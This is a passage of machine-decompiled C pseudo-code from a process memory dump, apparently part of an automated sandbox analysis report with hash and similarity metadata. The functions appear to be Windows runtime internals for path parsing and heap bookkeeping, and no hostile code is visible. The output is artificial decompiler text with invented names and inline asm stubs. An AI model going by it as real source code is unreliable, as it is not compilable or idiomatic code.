                            											if((_t446 & 0x00000004) != 0) {
                            												__eflags =  *(_t528 - 0x9c);
                            												if( *(_t528 - 0x9c) != 0) {
                            													 *(_t528 - 0x7a) = 1;
                            													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                            													__eflags = _t511;
                            												}
                            											}
                            											_t313 = 2;
                            											_t447 = _t446 & _t313;
                            											__eflags = _t447;
                            											 *(_t528 - 0xd4) = _t447;
                            											if(_t447 != 0) {
                            												_t406 = 0x10;
                            												_t511 = _t511 + _t406;
                            												__eflags = _t511;
                            											}
                            											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                            											 *(_t528 - 0x88) = _t427;
                            											__eflags =  *(_t528 + 0x1c);
                            											if( *(_t528 + 0x1c) <= 0) {
                            												L45:
                            												__eflags =  *(_t528 - 0xb0);
                            												if( *(_t528 - 0xb0) != 0) {
                            													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                            													__eflags = _t511;
                            												}
                            												__eflags = _t475;
                            												if(_t475 != 0) {
                            													asm("lock dec dword [ecx+edx*8+0x4]");
                            													goto L100;
                            												} else {
                            													_t494[3] = _t511;
                            													_t451 =  *(_t528 - 0xa0);
                            													_t427 = E01326DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                            													 *(_t528 - 0x88) = _t427;
                            													__eflags = _t427;
                            													if(_t427 == 0) {
                            														__eflags = _t511 - 0xfff8;
                            														if(_t511 <= 0xfff8) {
                            															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                            															asm("sbb ecx, ecx");
                            															__eflags = (_t451 & 0x000000e2) + 8;
                            														}
                            														asm("lock dec dword [eax+edx*8+0x4]");
                            														L100:
                            														goto L101;
                            													}
                            													_t453 =  *(_t528 - 0xa0);
                            													 *_t494 = _t453;
                            													_t494[1] = _t427;
                            													_t494[2] =  *(_t528 - 0xbc);
                            													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                            													 *_t427 =  *(_t453 + 0x24) | _t511;
                            													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                            													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													__eflags =  *(_t528 + 0x14);
                            													if( *(_t528 + 0x14) == 0) {
                            														__eflags =  *[fs:0x18] + 0xf50;
                            													}
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													asm("movsd");
                            													__eflags =  *(_t528 + 0x18);
                            													if( *(_t528 + 0x18) == 0) {
                            														_t454 =  *(_t528 - 0x80);
                            														_t479 =  *(_t528 - 0x78);
                            														_t327 = 1;
                            														__eflags = 1;
                            													} else {
                            														_t146 = _t427 + 0x50; // 0x50
                            														_t454 = _t146;
                            														 *(_t528 - 0x80) = _t454;
                            														_t382 = 0x18;
                            														 *_t454 = _t382;
                            														 *((short*)(_t454 + 2)) = 1;
                            														_t385 = 0x10;
                            														 *((short*)(_t454 + 6)) = _t385;
                            														 *(_t454 + 4) = 0;
                            														asm("movsd");
                            														asm("movsd");
                            														asm("movsd");
                            														asm("movsd");
                            														_t327 = 1;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 = 0x68;
                            														 *(_t528 - 0x78) = _t479;
                            													}
                            													__eflags =  *(_t528 - 0x79) - _t327;
                            													if( *(_t528 - 0x79) == _t327) {
                            														_t524 = _t479 + _t427;
                            														_t508 =  *(_t528 - 0x8c);
                            														 *_t524 = _t508;
                            														_t373 = 2;
                            														 *((short*)(_t524 + 2)) = _t373;
                            														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                            														 *((short*)(_t524 + 4)) = 0;
                            														_t167 = _t524 + 8; // 0x8
                            														E0132F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                            														_t529 = _t529 + 0xc;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                            														 *(_t528 - 0x78) = _t479;
                            														_t380 =  *(_t528 - 0x80);
                            														__eflags = _t380;
                            														if(_t380 != 0) {
                            															_t173 = _t380 + 4;
                            															 *_t173 =  *(_t380 + 4) | 1;
                            															__eflags =  *_t173;
                            														}
                            														_t454 = _t524;
                            														 *(_t528 - 0x80) = _t454;
                            														_t327 = 1;
                            														__eflags = 1;
                            													}
                            													__eflags =  *(_t528 - 0xd4);
                            													if( *(_t528 - 0xd4) == 0) {
                            														_t505 =  *(_t528 - 0x80);
                            													} else {
                            														_t505 = _t479 + _t427;
                            														_t523 = 0x10;
                            														 *_t505 = _t523;
                            														_t367 = 3;
                            														 *((short*)(_t505 + 2)) = _t367;
                            														_t368 = 4;
                            														 *((short*)(_t505 + 6)) = _t368;
                            														 *(_t505 + 4) = 0;
                            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                            														_t327 = 1;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 = _t479 + _t523;
                            														 *(_t528 - 0x78) = _t479;
                            														__eflags = _t454;
                            														if(_t454 != 0) {
                            															_t186 = _t454 + 4;
                            															 *_t186 =  *(_t454 + 4) | 1;
                            															__eflags =  *_t186;
                            														}
                            														 *(_t528 - 0x80) = _t505;
                            													}
                            													__eflags =  *(_t528 - 0x7a) - _t327;
                            													if( *(_t528 - 0x7a) == _t327) {
                            														 *(_t528 - 0xd4) = _t479 + _t427;
                            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                            														E0132F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                            														_t529 = _t529 + 0xc;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 =  *(_t528 - 0x78) + _t522;
                            														 *(_t528 - 0x78) = _t479;
                            														__eflags = _t505;
                            														if(_t505 != 0) {
                            															_t199 = _t505 + 4;
                            															 *_t199 =  *(_t505 + 4) | 1;
                            															__eflags =  *_t199;
                            														}
                            														_t505 =  *(_t528 - 0xd4);
                            														 *(_t528 - 0x80) = _t505;
                            													}
                            													__eflags =  *(_t528 - 0xa8);
                            													if( *(_t528 - 0xa8) != 0) {
                            														_t356 = _t479 + _t427;
                            														 *(_t528 - 0xd4) = _t356;
                            														_t462 =  *(_t528 - 0xac);
                            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                            														_t485 = 0xc;
                            														 *((short*)(_t356 + 2)) = _t485;
                            														 *(_t356 + 6) = _t462;
                            														 *((short*)(_t356 + 4)) = 0;
                            														_t211 = _t356 + 8; // 0x9
                            														E0132F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                            														E0132FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                            														_t529 = _t529 + 0x18;
                            														_t427 =  *(_t528 - 0x88);
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t505 =  *(_t528 - 0xd4);
                            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                            														 *(_t528 - 0x78) = _t479;
                            														_t362 =  *(_t528 - 0x80);
                            														__eflags = _t362;
                            														if(_t362 != 0) {
                            															_t222 = _t362 + 4;
                            															 *_t222 =  *(_t362 + 4) | 1;
                            															__eflags =  *_t222;
                            														}
                            													}
                            													__eflags =  *(_t528 - 0xb0);
                            													if( *(_t528 - 0xb0) != 0) {
                            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                            														_t458 = 0xb;
                            														 *((short*)(_t479 + _t427 + 2)) = _t458;
                            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                            														 *((short*)(_t427 + 4 + _t479)) = 0;
                            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                            														E0132FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                            														_t529 = _t529 + 0xc;
                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                            														 *(_t528 - 0x78) = _t479;
                            														__eflags = _t505;
                            														if(_t505 != 0) {
                            															_t241 = _t505 + 4;
                            															 *_t241 =  *(_t505 + 4) | 1;
                            															__eflags =  *_t241;
                            														}
                            													}
                            													_t328 =  *(_t528 + 0x1c);
                            													__eflags = _t328;
                            													if(_t328 == 0) {
                            														L87:
                            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                            														_t455 =  *(_t528 - 0xdc);
                            														 *(_t427 + 0x14) = _t455;
                            														_t480 =  *(_t528 - 0xa0);
                            														_t517 = 3;
                            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                            															asm("rdtsc");
                            															 *(_t427 + 0x3c) = _t480;
                            														} else {
                            															 *(_t427 + 0x3c) = _t455;
                            														}
                            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                            														_t456 =  *[fs:0x18];
                            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                            														_t427 = 0;
                            														__eflags = 0;
                            														_t511 = 0x18;
                            														goto L91;
                            													} else {
                            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                            														__eflags = _t519;
                            														 *(_t528 - 0x8c) = _t328;
                            														do {
                            															_t506 =  *((intOrPtr*)(_t519 - 4));
                            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                            															 *(_t528 - 0xd4) =  *(_t519 - 8);
                            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                            															__eflags =  *(_t333 + 0x36) & 0x00004000;
                            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                            																_t334 =  *_t519;
                            															} else {
                            																_t334 = 0;
                            															}
                            															_t336 = _t334 & 0x000000ff;
                            															__eflags = _t336;
                            															_t427 =  *(_t528 - 0x88);
                            															if(_t336 == 0) {
                            																_t481 = _t479 + _t506;
                            																__eflags = _t481;
                            																 *(_t528 - 0x78) = _t481;
                            																E0132F3E0(_t479 + _t427, _t457, _t506);
                            																_t529 = _t529 + 0xc;
                            															} else {
                            																_t340 = _t336 - 1;
                            																__eflags = _t340;
                            																if(_t340 == 0) {
                            																	E0132F3E0( *(_t528 - 0xb8), _t457, _t506);
                            																	_t529 = _t529 + 0xc;
                            																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                            																} else {
                            																	__eflags = _t340 == 0;
                            																	if(_t340 == 0) {
                            																		__eflags = _t506 - 8;
                            																		if(_t506 == 8) {
                            																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                            																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                            																		}
                            																	}
                            																}
                            															}
                            															_t339 = 0x10;
                            															_t519 = _t519 + _t339;
                            															_t263 = _t528 - 0x8c;
                            															 *_t263 =  *(_t528 - 0x8c) - 1;
                            															__eflags =  *_t263;
                            															_t479 =  *(_t528 - 0x78);
                            														} while ( *_t263 != 0);
                            														goto L87;
                            													}
                            												}
                            											} else {
                            												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                            												 *(_t528 - 0xa2) = _t392;
                            												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                            												__eflags = _t469;
                            												while(1) {
                            													 *(_t528 - 0xe4) = _t511;
                            													__eflags = _t392;
                            													_t393 = _t427;
                            													if(_t392 != 0) {
                            														_t393 =  *((intOrPtr*)(_t469 + 4));
                            													}
                            													_t395 = (_t393 & 0x000000ff) - _t427;
                            													__eflags = _t395;
                            													if(_t395 == 0) {
                            														_t511 = _t511 +  *_t469;
                            														__eflags = _t511;
                            													} else {
                            														_t398 = _t395 - 1;
                            														__eflags = _t398;
                            														if(_t398 == 0) {
                            															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                            															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                            														} else {
                            															__eflags = _t398 == 1;
                            															if(_t398 == 1) {
                            																 *(_t528 - 0xa8) =  *(_t469 - 8);
                            																_t402 =  *_t469 & 0x0000ffff;
                            																 *(_t528 - 0xac) = _t402;
                            																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                            															}
                            														}
                            													}
                            													__eflags = _t511 -  *(_t528 - 0xe4);
                            													if(_t511 <  *(_t528 - 0xe4)) {
                            														break;
                            													}
                            													_t397 =  *(_t528 - 0x88) + 1;
                            													 *(_t528 - 0x88) = _t397;
                            													_t469 = _t469 + 0x10;
                            													__eflags = _t397 -  *(_t528 + 0x1c);
                            													_t392 =  *(_t528 - 0xa2);
                            													if(_t397 <  *(_t528 + 0x1c)) {
                            														continue;
                            													}
                            													goto L45;
                            												}
                            												_t475 = 0x216;
                            												 *(_t528 - 0x74) = 0x216;
                            												goto L45;
                            											}
                            										} else {
                            											asm("lock dec dword [eax+ecx*8+0x4]");
                            											goto L16;
                            										}
                            									}
                            									_t491 = E013B4CAB(_t306, _t528 - 0xa4);
                            									 *(_t528 - 0x74) = _t491;
                            									__eflags = _t491;
                            									if(_t491 != 0) {
                            										goto L91;
                            									} else {
                            										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                            										goto L20;
                            									}
                            								}
                            								L16:
                            								 *(_t528 - 0x74) = 0x1069;
                            								L93:
                            								_t298 =  *(_t528 - 0xd0) + 1;
                            								 *(_t528 - 0xd0) = _t298;
                            								_t474 = _t474 + _t511;
                            								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                            								_t494 = 4;
                            								__eflags = _t298 - _t494;
                            								if(_t298 >= _t494) {
                            									goto L100;
                            								}
                            								_t494 =  *(_t528 - 0xcc);
                            								_t435 = _t298;
                            								continue;
                            							}
                            							__eflags = _t494[2] | _t494[3];
                            							if((_t494[2] | _t494[3]) == 0) {
                            								goto L15;
                            							}
                            							goto L12;
                            						}
                            						__eflags = _t301;
                            						if(_t301 != 0) {
                            							goto L92;
                            						}
                            						goto L10;
                            						L92:
                            						goto L93;
                            					}
                            				} else {
                            					_push(0x57);
                            					L101:
                            					return E0133D130(_t427, _t494, _t511);
                            				}
                            			}


                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 559feb349b7566b55810f5882034ce60b8f1b24611ea9cf84b2bb92a18a3b6ce
                            • Instruction ID: 4bd3b9b340bade24691d6c37f6b25495a5867998af47751e3af47644746420db
                            • Opcode Fuzzy Hash: 559feb349b7566b55810f5882034ce60b8f1b24611ea9cf84b2bb92a18a3b6ce
                            • Instruction Fuzzy Hash: 7E425071901219CFDB24CF68C881BE9BBB5FF45308F1481AADA4DEB652E7349985CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E01304120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                            				signed int _v8;
                            				void* _v20;
                            				signed int _v24;
                            				char _v532;
                            				char _v540;
                            				signed short _v544;
                            				signed int _v548;
                            				signed short* _v552;
                            				signed short _v556;
                            				signed short* _v560;
                            				signed short* _v564;
                            				signed short* _v568;
                            				void* _v570;
                            				signed short* _v572;
                            				signed short _v576;
                            				signed int _v580;
                            				char _v581;
                            				void* _v584;
                            				unsigned int _v588;
                            				signed short* _v592;
                            				void* _v597;
                            				void* _v600;
                            				void* _v604;
                            				void* _v609;
                            				void* _v616;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				unsigned int _t161;
                            				signed int _t162;
                            				unsigned int _t163;
                            				void* _t169;
                            				signed short _t173;
                            				signed short _t177;
                            				signed short _t181;
                            				unsigned int _t182;
                            				signed int _t185;
                            				signed int _t213;
                            				signed int _t225;
                            				short _t233;
                            				signed char _t234;
                            				signed int _t242;
                            				signed int _t243;
                            				signed int _t244;
                            				signed int _t245;
                            				signed int _t250;
                            				void* _t251;
                            				signed short* _t254;
                            				void* _t255;
                            				signed int _t256;
                            				void* _t257;
                            				signed short* _t260;
                            				signed short _t265;
                            				signed short* _t269;
                            				signed short _t271;
                            				signed short** _t272;
                            				signed short* _t275;
                            				signed short _t282;
                            				signed short _t283;
                            				signed short _t290;
                            				signed short _t299;
                            				signed short _t307;
                            				signed int _t308;
                            				signed short _t311;
                            				signed short* _t315;
                            				signed short _t316;
                            				void* _t317;
                            				void* _t319;
                            				signed short* _t321;
                            				void* _t322;
                            				void* _t323;
                            				unsigned int _t324;
                            				signed int _t325;
                            				void* _t326;
                            				signed int _t327;
                            				signed int _t329;
                            
                            				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                            				_v8 =  *0x13dd360 ^ _t329;
                            				_t157 = _a8;
                            				_t321 = _a4;
                            				_t315 = __edx;
                            				_v548 = __ecx;
                            				_t305 = _a20;
                            				_v560 = _a12;
                            				_t260 = _a16;
                            				_v564 = __edx;
                            				_v580 = _a8;
                            				_v572 = _t260;
                            				_v544 = _a20;
                            				if( *__edx <= 8) {
                            					L3:
                            					if(_t260 != 0) {
                            						 *_t260 = 0;
                            					}
                            					_t254 =  &_v532;
                            					_v588 = 0x208;
                            					if((_v548 & 0x00000001) != 0) {
                            						_v556 =  *_t315;
                            						_v552 = _t315[2];
                            						_t161 = E0131F232( &_v556);
                            						_t316 = _v556;
                            						_v540 = _t161;
                            						goto L17;
                            					} else {
                            						_t306 = 0x208;
                            						_t298 = _t315;
                            						_t316 = E01306E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                            						if(_t316 == 0) {
                            							L68:
                            							_t322 = 0xc0000033;
                            							goto L39;
                            						} else {
                            							while(_v581 == 0) {
                            								_t233 = _v588;
                            								if(_t316 > _t233) {
                            									_t234 = _v548;
                            									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                            										_t254 = L01304620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                            										if(_t254 == 0) {
                            											_t169 = 0xc0000017;
                            										} else {
                            											_t298 = _v564;
                            											_v588 = _t316;
                            											_t306 = _t316;
                            											_t316 = E01306E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                            											if(_t316 != 0) {
                            												continue;
                            											} else {
                            												goto L68;
                            											}
                            										}
                            									} else {
                            										goto L90;
                            									}
                            								} else {
                            									_v556 = _t316;
                            									 *((short*)(_t329 + 0x32)) = _t233;
                            									_v552 = _t254;
                            									if(_t316 < 2) {
                            										L11:
                            										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                            											_t161 = 5;
                            										} else {
                            											if(_t316 < 6) {
                            												L87:
                            												_t161 = 3;
                            											} else {
                            												_t242 = _t254[2] & 0x0000ffff;
                            												if(_t242 != 0x5c) {
                            													if(_t242 == 0x2f) {
                            														goto L16;
                            													} else {
                            														goto L87;
                            													}
                            													goto L101;
                            												} else {
                            													L16:
                            													_t161 = 2;
                            												}
                            											}
                            										}
                            									} else {
                            										_t243 =  *_t254 & 0x0000ffff;
                            										if(_t243 == 0x5c || _t243 == 0x2f) {
                            											if(_t316 < 4) {
                            												L81:
                            												_t161 = 4;
                            												goto L17;
                            											} else {
                            												_t244 = _t254[1] & 0x0000ffff;
                            												if(_t244 != 0x5c) {
                            													if(_t244 == 0x2f) {
                            														goto L60;
                            													} else {
                            														goto L81;
                            													}
                            												} else {
                            													L60:
                            													if(_t316 < 6) {
                            														L83:
                            														_t161 = 1;
                            														goto L17;
                            													} else {
                            														_t245 = _t254[2] & 0x0000ffff;
                            														if(_t245 != 0x2e) {
                            															if(_t245 == 0x3f) {
                            																goto L62;
                            															} else {
                            																goto L83;
                            															}
                            														} else {
                            															L62:
                            															if(_t316 < 8) {
                            																L85:
                            																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                            																goto L17;
                            															} else {
                            																_t250 = _t254[3] & 0x0000ffff;
                            																if(_t250 != 0x5c) {
                            																	if(_t250 == 0x2f) {
                            																		goto L64;
                            																	} else {
                            																		goto L85;
                            																	}
                            																} else {
                            																	L64:
                            																	_t161 = 6;
                            																	goto L17;
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            											goto L101;
                            										} else {
                            											goto L11;
                            										}
                            									}
                            									L17:
                            									if(_t161 != 2) {
                            										_t162 = _t161 - 1;
                            										if(_t162 > 5) {
                            											goto L18;
                            										} else {
                            											switch( *((intOrPtr*)(_t162 * 4 +  &M013045F8))) {
                            												case 0:
                            													_v568 = 0x12c1078;
                            													__eax = 2;
                            													goto L20;
                            												case 1:
                            													goto L18;
                            												case 2:
                            													_t163 = 4;
                            													goto L19;
                            											}
                            										}
                            										goto L41;
                            									} else {
                            										L18:
                            										_t163 = 0;
                            										L19:
                            										_v568 = 0x12c11c4;
                            									}
                            									L20:
                            									_v588 = _t163;
                            									_v564 = _t163 + _t163;
                            									_t306 =  *_v568 & 0x0000ffff;
                            									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                            									_v576 = _t265;
                            									if(_t265 > 0xfffe) {
                            										L90:
                            										_t322 = 0xc0000106;
                            									} else {
                            										if(_t321 != 0) {
                            											if(_t265 > (_t321[1] & 0x0000ffff)) {
                            												if(_v580 != 0) {
                            													goto L23;
                            												} else {
                            													_t322 = 0xc0000106;
                            													goto L39;
                            												}
                            											} else {
                            												_t177 = _t306;
                            												goto L25;
                            											}
                            											goto L101;
                            										} else {
                            											if(_v580 == _t321) {
                            												_t322 = 0xc000000d;
                            											} else {
                            												L23:
                            												_t173 = L01304620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                            												_t269 = _v592;
                            												_t269[2] = _t173;
                            												if(_t173 == 0) {
                            													_t322 = 0xc0000017;
                            												} else {
                            													_t316 = _v556;
                            													 *_t269 = 0;
                            													_t321 = _t269;
                            													_t269[1] = _v576;
                            													_t177 =  *_v568 & 0x0000ffff;
                            													L25:
                            													_v580 = _t177;
                            													if(_t177 == 0) {
                            														L29:
                            														_t307 =  *_t321 & 0x0000ffff;
                            													} else {
                            														_t290 =  *_t321 & 0x0000ffff;
                            														_v576 = _t290;
                            														_t310 = _t177 & 0x0000ffff;
                            														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                            															_t307 =  *_t321 & 0xffff;
                            														} else {
                            															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                            															E0132F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                            															_t329 = _t329 + 0xc;
                            															_t311 = _v580;
                            															_t225 =  *_t321 + _t311 & 0x0000ffff;
                            															 *_t321 = _t225;
                            															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                            																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                            															}
                            															goto L29;
                            														}
                            													}
                            													_t271 = _v556 - _v588 + _v588;
                            													_v580 = _t307;
                            													_v576 = _t271;
                            													if(_t271 != 0) {
                            														_t308 = _t271 & 0x0000ffff;
                            														_v588 = _t308;
                            														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                            															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                            															E0132F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                            															_t329 = _t329 + 0xc;
                            															_t213 =  *_t321 + _v576 & 0x0000ffff;
                            															 *_t321 = _t213;
                            															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                            																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                            															}
                            														}
                            													}
                            													_t272 = _v560;
                            													if(_t272 != 0) {
                            														 *_t272 = _t321;
                            													}
                            													_t306 = 0;
                            													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                            													_t275 = _v572;
                            													if(_t275 != 0) {
                            														_t306 =  *_t275;
                            														if(_t306 != 0) {
                            															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                            														}
                            													}
                            													_t181 = _v544;
                            													if(_t181 != 0) {
                            														 *_t181 = 0;
                            														 *((intOrPtr*)(_t181 + 4)) = 0;
                            														 *((intOrPtr*)(_t181 + 8)) = 0;
                            														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                            														if(_v540 == 5) {
                            															_t182 = E012E52A5(1);
                            															_v588 = _t182;
                            															if(_t182 == 0) {
                            																E012FEB70(1, 0x13d79a0);
                            																goto L38;
                            															} else {
                            																_v560 = _t182 + 0xc;
                            																_t185 = E012FAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                            																if(_t185 == 0) {
                            																	_t324 = _v588;
                            																	goto L97;
                            																} else {
                            																	_t306 = _v544;
                            																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                            																	 *(_t306 + 4) = _t282;
                            																	_v576 = _t282;
                            																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                            																	 *_t306 = _t325;
                            																	if( *_t282 == 0x5c) {
                            																		_t149 = _t325 - 2; // -2
                            																		_t283 = _t149;
                            																		 *_t306 = _t283;
                            																		 *(_t306 + 4) = _v576 + 2;
                            																		_t185 = _t283 & 0x0000ffff;
                            																	}
                            																	_t324 = _v588;
                            																	 *(_t306 + 2) = _t185;
                            																	if((_v548 & 0x00000002) == 0) {
                            																		L97:
                            																		asm("lock xadd [esi], eax");
                            																		if((_t185 | 0xffffffff) == 0) {
                            																			_push( *((intOrPtr*)(_t324 + 4)));
                            																			E013295D0();
                            																			L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                            																		}
                            																	} else {
                            																		 *(_t306 + 0xc) = _t324;
                            																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                            																	}
                            																	goto L38;
                            																}
                            															}
                            															goto L41;
                            														}
                            													}
                            													L38:
                            													_t322 = 0;
                            												}
                            											}
                            										}
                            									}
                            									L39:
                            									if(_t254 !=  &_v532) {
                            										L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                            									}
                            									_t169 = _t322;
                            								}
                            								goto L41;
                            							}
                            							goto L68;
                            						}
                            					}
                            					L41:
                            					_pop(_t317);
                            					_pop(_t323);
                            					_pop(_t255);
                            					return E0132B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                            				} else {
                            					_t299 = __edx[2];
                            					if( *_t299 == 0x5c) {
                            						_t256 =  *(_t299 + 2) & 0x0000ffff;
                            						if(_t256 != 0x5c) {
                            							if(_t256 != 0x3f) {
                            								goto L2;
                            							} else {
                            								goto L50;
                            							}
                            						} else {
                            							L50:
                            							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                            								goto L2;
                            							} else {
                            								_t251 = E01323D43(_t315, _t321, _t157, _v560, _v572, _t305);
                            								_pop(_t319);
                            								_pop(_t326);
                            								_pop(_t257);
                            								return E0132B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                            							}
                            						}
                            					} else {
                            						L2:
                            						_t260 = _v572;
                            						goto L3;
                            					}
                            				}
                            				L101:
                            			}

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e52b98e153a3450486c8c5b9c19dd2f52fa43a0695a2e12e2b945cb84b468a90
                            • Instruction ID: 914506dbd60f731848da9a4845d9aec8517d86594a31e0a2d05d417643df89b2
                            • Opcode Fuzzy Hash: e52b98e153a3450486c8c5b9c19dd2f52fa43a0695a2e12e2b945cb84b468a90
                            • Instruction Fuzzy Hash: 6CF18F70608211CFC726DF19C490A7AB7E5FF88718F05492EF686CB691E734EA91CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E013120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                            				signed int _v16;
                            				signed int _v20;
                            				signed char _v24;
                            				intOrPtr _v28;
                            				signed int _v32;
                            				void* _v36;
                            				char _v48;
                            				signed int _v52;
                            				signed int _v56;
                            				unsigned int _v60;
                            				char _v64;
                            				unsigned int _v68;
                            				signed int _v72;
                            				char _v73;
                            				signed int _v74;
                            				char _v75;
                            				signed int _v76;
                            				void* _v81;
                            				void* _v82;
                            				void* _v89;
                            				void* _v92;
                            				void* _v97;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed char _t128;
                            				void* _t129;
